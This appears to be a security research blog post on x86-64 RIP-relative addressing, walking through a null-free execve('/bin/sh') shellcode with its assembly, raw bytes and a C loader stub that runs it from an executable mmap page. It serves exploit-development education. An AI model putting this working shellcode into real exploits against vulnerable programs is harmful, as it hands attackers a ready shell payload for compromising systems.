Instruction Pointer Relative Addressing (for position independent code)
So, here's an interesting trick I've been using that I've never seen anyone mention before. One of the new features AMD added to the x86 instruction set when they designed AMD64/x86-64 is that in "long mode" (64-bit mode), the encoding for the old 32-bit immediate offset addressing mode is now a 32-bit offset from the current RIP, not from 0x00000000 like before. In English, this means that you don't have to know the absolute address of something you want to reference; you only need to know how far away it is from the currently executing instruction (technically, from the next instruction).
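If it helps to see the arithmetic, here is a minimal sketch in C of how a RIP-relative operand gets resolved: the signed 32-bit displacement is added to the address of the next instruction. The function name and the 0x400000 address used in the note are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: resolve a RIP-relative operand.
 * insn_addr: address of the first byte of the instruction
 * insn_len:  length of the whole instruction in bytes
 * disp32:    signed 32-bit displacement taken from the encoding */
static uint64_t rip_relative_target(uint64_t insn_addr, size_t insn_len,
                                    int32_t disp32)
{
    assert(insn_len > 0 && insn_len <= 15);      /* x86 instructions are at most 15 bytes */
    uint64_t next_rip = insn_addr + insn_len;    /* RIP already points past this instruction */
    return next_rip + (uint64_t)(int64_t)disp32; /* sign-extend, then add (wraps mod 2^64) */
}
```

For a 7-byte instruction at 0x400000, a displacement of -7 points back at the instruction itself, and a displacement of 0 points at 0x400007.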
So, let's say you're writing a fairly generic execve() shellcode. I'm going to assume that everyone here has read Aleph One's paper on this, so I'm not going to repeat that here. (Gripe: What is it with all these shellcode tutorials, that are just slightly rewritten copies of "Smashing the Stack…"?)
This is what we want to do:
execve() example in C
#include <stdio.h>
#include <unistd.h> /* execve() */
int main() {
    char *name[2];
    asm("nop");
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    asm("nop");
    return 0;
}
I just put the NOPs in there to make things easier to spot below.
gdb spewage
gcc -static -g -o example example.c
gdb example
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400284 <main+0>: push %rbp
0x0000000000400285 <main+1>: mov %rsp,%rbp
0x0000000000400288 <main+4>: sub $0x10,%rsp
0x000000000040028c <main+8>: nop
0x000000000040028d <main+9>: movq $0x451ce4,0xfffffffffffffff0(%rbp)
0x0000000000400295 <main+17>: movq $0x0,0xfffffffffffffff8(%rbp)
0x000000000040029d <main+25>: lea 0xfffffffffffffff0(%rbp),%rsi
0x00000000004002a1 <main+29>: mov 0xfffffffffffffff0(%rbp),%rdi
0x00000000004002a5 <main+33>: mov $0x0,%edx
0x00000000004002aa <main+38>: mov $0x0,%eax
0x00000000004002af <main+43>: callq 0x406740 <execve>
0x00000000004002b4 <main+48>: nop
0x00000000004002b5 <main+49>: mov $0x0,%eax
0x00000000004002ba <main+54>: leaveq
0x00000000004002bb <main+55>: retq
End of assembler dump.
(gdb) disassemble execve
Dump of assembler code for function execve:
0x0000000000406740 <execve+0>: mov $0x0,%eax
0x0000000000406745 <execve+5>: mov %rbx,0xffffffffffffffe8(%rsp)
0x000000000040674a <execve+10>: mov %rbp,0xfffffffffffffff0(%rsp)
0x000000000040674f <execve+15>: mov %r12,0xfffffffffffffff8(%rsp)
0x0000000000406754 <execve+20>: sub $0x18,%rsp
0x0000000000406758 <execve+24>: test %rax,%rax
0x000000000040675b <execve+27>: mov %rdi,%r12
0x000000000040675e <execve+30>: mov %rsi,%rbp
0x0000000000406761 <execve+33>: mov %rdx,%rbx
0x0000000000406764 <execve+36>: je 0x40676b <execve+43>
0x0000000000406766 <execve+38>: callq 0x0
0x000000000040676b <execve+43>: mov %rbx,%rdx
0x000000000040676e <execve+46>: mov %rbp,%rsi
0x0000000000406771 <execve+49>: mov %r12,%rdi
0x0000000000406774 <execve+52>: mov $0x3b,%eax
0x0000000000406779 <execve+57>: syscall
You can ignore the rest of this...
0x000000000040677b <execve+59>: cmp $0xfffffffffffff000,%rax
0x0000000000406781 <execve+65>: mov %rax,%rbx
0x0000000000406784 <execve+68>: ja 0x40679b <execve+91>
0x0000000000406786 <execve+70>: mov %ebx,%eax
0x0000000000406788 <execve+72>: mov 0x8(%rsp),%rbp
0x000000000040678d <execve+77>: mov (%rsp),%rbx
0x0000000000406791 <execve+81>: mov 0x10(%rsp),%r12
0x0000000000406796 <execve+86>: add $0x18,%rsp
0x000000000040679a <execve+90>: retq
0x000000000040679b <execve+91>: callq 0x400950 <__errno_location>
0x00000000004067a0 <execve+96>: mov %ebx,%edx
0x00000000004067a2 <execve+98>: mov $0xffffffffffffffff,%rbx
0x00000000004067a9 <execve+105>: neg %edx
0x00000000004067ab <execve+107>: mov %edx,(%rax)
0x00000000004067ad <execve+109>: jmp 0x406786 <execve+70>
0x00000000004067af <execve+111>: nop
End of assembler dump.
(gdb) x/s 0x451ce4
0x451ce4 <_IO_stdin_used+4>: "/bin/sh"
For lack of being able to easily draw arrows in flat HTML, I'm just coloring the important parts. As you can see, argument 1 (the pointer to "/bin/sh") is in RDI; argument 2 (the pointer to the pointer to "/bin/sh", followed by NULL) is in RSI; and argument 3, in RDX, is NULL. 0x3B (59 decimal) is the syscall number for execve.
We could have also just looked in /usr/linux/include/asm/unistd.h for the calling convention.
Excerpt from unistd.h
[...]
#define __NR_execve 59
__SYSCALL(__NR_execve, stub_execve)
#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
    long __res; \
    __asm__ volatile (__syscall \
        : "=a" (__res) \
        : "0" (__NR_##name),"D" ((long)(arg1)),"S" ((long)(arg2)), \
          "d" ((long)(arg3)) : __syscall_clobber); \
    __syscall_return(type,__res); \
}
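The same register assignment can be written out by hand. What follows is only a sketch, assuming GCC or Clang inline assembly on x86-64 Linux; raw_syscall3 is a name I made up, and on any other platform it just falls back to libc's syscall().

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical wrapper: issue a 3-argument Linux system call.
 * x86-64 register assignment: RAX = number, RDI/RSI/RDX = arguments 1-3. */
static long raw_syscall3(long nr, long arg1, long arg2, long arg3)
{
    assert(nr >= 0);                             /* syscall numbers are non-negative */
#if defined(__x86_64__) && defined(__linux__)
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "0"(nr), "D"(arg1), "S"(arg2), "d"(arg3)
                      : "rcx", "r11", "memory"); /* SYSCALL itself clobbers RCX and R11 */
    return ret;                                  /* raw kernel result: negative errno on failure */
#else
    return syscall(nr, arg1, arg2, arg3);        /* fallback: let libc pick the registers */
#endif
}
```

With this, the execve() call from the C example would be raw_syscall3(SYS_execve, (long)name[0], (long)name, 0). A harmless way to try it is raw_syscall3(SYS_getpid, 0, 0, 0), which should match getpid().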
So, all we have to do is have a "/bin/sh" string somewhere in memory, and a pointer to it somewhere else, followed by a NULL. Wherever our shellcode got written to is as good a place as any, but how do we know where we're executing from? On IA-32, there are only two really easy ways to get your current EIP: by making a CALL foo, which is like doing a PUSH EIP ; JMP foo, or by executing a floating point instruction and then dumping the x87 environment out into memory with FSTENV, which includes the address of the last floating point instruction executed. (Historically, the FPU was a completely separate chip, and would do its own exception handling, and stuff.)
In Aleph One's original paper he did this trick:
JMP foo
bar: POP ESI
<rest of shellcode>
foo: CALL bar
.string "/bin/sh"
Which gives you, in ESI, the address of that "/bin/sh" at the end of your shellcode. Most of the Pex decoders in the Metasploit Framework use FSTENV to write the FPU environment out onto the stack, starting 12 bytes below the current ESP in fact, which leaves the fourth DWORD (offset 12), the EIP, at the top, which can then just be POP'ed off.
On x86-64, it is much easier to find your current RIP; just do this:
LEA RAX, [RIP]
And RAX will contain the address of the next instruction. (Use the full 64-bit register; with EAX you only get the low 32 bits of the address.)
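If you want to poke at this from C, here is a minimal sketch using GCC/Clang inline assembly (AT&T syntax, so the operand order is flipped). The helper name current_rip is hypothetical, and on anything other than x86-64 it just returns the function's own address as a stand-in.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: return an address inside this function.
 * On x86-64 that is the address of the instruction right after the LEA. */
__attribute__((noinline))
static uintptr_t current_rip(void)
{
#if defined(__x86_64__)
    uintptr_t ip;
    __asm__ volatile ("lea 0(%%rip), %0" : "=r"(ip)); /* LEA reg, [RIP+0] */
    assert(ip != 0);
    return ip;
#else
    return (uintptr_t)&current_rip; /* no RIP-relative addressing on this target */
#endif
}
```

The value returned lands a few bytes past the start of current_rip(), since the only things in front of the LEA are the function prologue and the LEA itself.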
blah blah blah…
So, I was going to write a long narrative here, about how to write shellcode, and remove nulls, and use shorter instruction encodings and stuff. But I was just distracted, and lost my train of thought. So if there's anything here you don't understand, just ask. By doing [RIP-7] rather than just [RIP], you avoid having a 0x00000000 immediate value. Everything else should be self-explanatory. I'm writing the argv array just past the end of the "/bin/sh" string.
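The null-byte point is easy to check mechanically. This C sketch hand-encodes LEA RDI, [RIP+disp32] (REX.W prefix 48, opcode 8D, ModRM 3D, then the displacement in little-endian order) and looks for 0x00 bytes. The function names are made up for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Encode LEA RDI, [RIP+disp32]: 48 8D 3D followed by disp32 (little-endian).
 * ModRM 0x3D is mod=00, reg=111 (RDI), r/m=101 (RIP-relative in long mode). */
static void encode_lea_rdi_rip(int32_t disp32, uint8_t out[7])
{
    uint32_t d = (uint32_t)disp32;
    out[0] = 0x48; out[1] = 0x8D; out[2] = 0x3D;
    for (int i = 0; i < 4; i++)
        out[3 + i] = (uint8_t)(d >> (8 * i));
}

/* True if any byte is 0x00, which would cut a string copy short. */
static bool has_null_byte(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            return true;
    return false;
}

/* Convenience wrapper: does the encoded LEA contain a null byte? */
static bool lea_rip_has_null(int32_t disp32)
{
    uint8_t insn[7];
    encode_lea_rdi_rip(disp32, insn);
    return has_null_byte(insn, sizeof insn);
}
```

A displacement of 0 encodes as 48 8D 3D 00 00 00 00, and any small positive offset leaves three zero bytes, while -7 encodes as 48 8D 3D F9 FF FF FF with no zeros at all. That is why the positive offset to the string is added afterwards with a one-byte immediate.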
Shellcode
%define arg1 RDI
%define arg2 RSI
%define arg3 RDX
%define arg3_lowb DL
%define sys_nr AL
%define nr_execve 0x3B
BITS 64
LEA arg1, [RIP-here] ; runtime address of *this* LEA instruction,
; removes 00000000's (always encode with 32-bit
; immediate)
; todo: could just push string onto stack (as
; immediate value)
here:
ADD arg1, BYTE bin_sh ; offset of "/bin/sh" in code below
XOR arg3, arg3 ; execve(..., ..., NULL);
MOV [arg1+null_byte ], arg3_lowb ; write a '\0' to end of string, just in case
MOV [arg1+null_point], arg3 ; name[1] = NULL;
MOV [arg1+name_array], arg1 ; name[0] = address to "/bin/sh" in
; execve("/bin/sh", ..., ...);
LEA arg2, [arg1+name_array] ; execve(..., name, ...);
MOV sys_nr, nr_execve ; Syscall 59 execve()
SYSCALL ; 64-bit syscall entry (INT 0x80 would go through the
; 32-bit syscall table, where 0x3B is not execve)
bin_sh:
db "/bin/sh";
null_byte equ $-bin_sh
name_array equ null_byte +1
null_point equ name_array+8
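To see what those three MOVs leave behind in memory, here is a C sketch that replays the same stores on an ordinary buffer. It assumes 8-byte pointers (as on x86-64); the offsets mirror null_byte, name_array and null_point above, but the function names are hypothetical, and nothing here makes the actual syscall.

```c
#include <assert.h>
#include <string.h>

_Static_assert(sizeof(char *) == 8, "sketch assumes 64-bit pointers");

enum {
    NULL_BYTE  = 7,              /* length of "/bin/sh"                  */
    NAME_ARRAY = NULL_BYTE + 1,  /* name[0] sits right after the NUL     */
    NULL_POINT = NAME_ARRAY + 8  /* name[1] follows the 8-byte pointer   */
};

/* Replay the shellcode's stores. `str` plays the role of RDI after the ADD:
 * it points at the 7 bytes "/bin/sh" with at least 17 writable bytes after
 * them. Returns what RSI would hold: the address of the name[] array. */
static void *build_argv_in_place(char *str)
{
    char *null_ptr = NULL;                                /* RDX = 0                   */
    assert(str != NULL);
    str[NULL_BYTE] = '\0';                                /* MOV [RDI+null_byte], DL   */
    memcpy(str + NULL_POINT, &null_ptr, sizeof null_ptr); /* MOV [RDI+null_point], RDX */
    memcpy(str + NAME_ARRAY, &str, sizeof str);           /* MOV [RDI+name_array], RDI */
    return str + NAME_ARRAY;                              /* LEA RSI, [RDI+name_array] */
}

/* Usage example: returns 1 if the layout comes out as expected. */
static int demo_layout(void)
{
    char buf[NULL_POINT + 8];
    char *name[2];
    memset(buf, 0xCC, sizeof buf);        /* junk, like whatever follows the shellcode */
    memcpy(buf, "/bin/sh", 7);            /* the unterminated string from the db line  */
    memcpy(name, build_argv_in_place(buf), sizeof name); /* read name[0] and name[1]   */
    return name[0] == buf && strcmp(name[0], "/bin/sh") == 0 && name[1] == NULL;
}
```

So after the stores, the 24 bytes starting at the string are: "/bin/sh", a NUL at offset 7, the string's own address at offset 8, and eight zero bytes at offset 16.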
The shellcode binary ends up looking like this:
Shellcode Bytes
488D3DF9FFFFFF LEA RDI, [RIP-here]
4883C721 ADD RDI, BYTE bin_sh
4831D2 XOR RDX, RDX
885707 MOV [RDI+null_byte ], DL
48895710 MOV [RDI+null_point], RDX
48897F08 MOV [RDI+name_array], RDI
488D7708 LEA RSI, [RDI+name_array]
B03B MOV AL, 0x3B
0F05 SYSCALL
2F62696E2F7368 db "/bin/sh"
To quickly test this out, I'm just mmapping a page of anonymous memory, writing the shellcode into there, and then running it. I have to do it this way because Gentoo Linux x86_64 will set memory pages to be either writable [X]OR executable, but not both at once, and non-exec actually works on AMD64. This is a lot faster than writing a real exploit (which would involve building my own stack frames to make return-to-libc calls, to call mprotect and stuff, blah blah).
memory map
00400000-00471000 r-xp 00000000 fd:05 4853 /home/jwolf/duh
00571000-00573000 rw-p 00071000 fd:05 4853 /home/jwolf/duh
00573000-00596000 rw-p 00573000 00:00 0 [heap]
2b429e3da000-2b429e3db000 rwxs 00000000 00:07 326570 /dev/zero (deleted) ← this is the mmap'd page
7fffff7f6000-7fffff80c000 rw-p 7fffff7f6000 00:00 0 [stack]
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vdso]
Cut and paste the spew from this, into the shellcode[], below:
yasm -l shellcode.log -L nasm shellcode.yasm && hexdump -v -e '1/1 "Qx%02x"' shellcode \
|tr "Q" \\\\ ; echo ; ls -l shellcode
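If you would rather not fight with hexdump format strings, the same conversion is a few lines of C. This is just a sketch of what the pipeline above produces (one \xNN escape per byte); the helper name is made up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: write `len` bytes as "\x48\x8d..." into `out`.
 * `out` must hold at least 4*len + 1 chars. Returns the number of
 * characters written, not counting the terminating NUL. */
static size_t to_c_escapes(const unsigned char *bytes, size_t len,
                           char *out, size_t out_size)
{
    assert(out_size >= 4 * len + 1);
    size_t pos = 0;
    for (size_t i = 0; i < len; i++)
        pos += (size_t)snprintf(out + pos, out_size - pos,
                                "\\x%02x", (unsigned)bytes[i]);
    out[pos] = '\0';
    return pos;
}
```

Feed it the raw bytes of the assembled file and print the result; the output can be pasted straight into a C string literal.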
Small code stub in C
#include <string.h>   /* memcpy() */
#include <sys/mman.h> /* mmap() */
// TODO: just mmap the binary file the assembler spit out.
char shellcode[] = "\x48\x8d\x3d\xf9\xff\xff\xff\x48\x83\xc7\x21\x48\x31\xd2\x88\x57\x07\x48\x89\x57\x10\x48\x89\x7f\x08\x48\x8d\x77\x08\xb0\x3b\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68";
int length = 40;
int main() {
    /* fd is ignored for MAP_ANONYMOUS on Linux; -1 is the portable value */
    void (*exec_mem)() = mmap (0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
                               MAP_SHARED|MAP_ANONYMOUS, -1, 0);
    if ((void *)exec_mem == MAP_FAILED)
        return 1;
    memcpy(exec_mem, shellcode, length);
    asm("break: nop"); /* label for gdb's "break break" */
    exec_mem();
}
Build with something like:
gcc -g -o stub stub.c
then ./stub
sh-3.00$
or if you were root at the time:
sh-3.00#
ta-da.
Debugging notes
If you need to debug this because you got a segfault, then that's a long long topic that I don't feel like writing about right now. I usually start off with:
gdb stub |tee -a gdb_spew.log
and then…
break break
display/i $rip
r
stepi
and then do "info reg" and "x/8xg" stuff as needed.
Postscript:
Has anyone else noticed that when running in 32-bit compatibility mode on AMD64 Linux, that:
- gdb is just plain broken (wrong values in registers, etc.)
- The register for the second argument to a syscall changes, seemingly at random, between ECX and EBP when you're using INT 0x80 vs. SYSCALL. (CD80 vs. 0F05)
Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com


Recent Comments
Cool trick. Seems like a lot of people still ignore x86-64. Matt Conover also commented on it in 2004, specifically related to OS-independent alphanumeric GetPC code:
http://seclists.org/fulldisclosure/2004/Oct/0105.html
anon on Instruction Pointer Relative Addressing (for position independent code)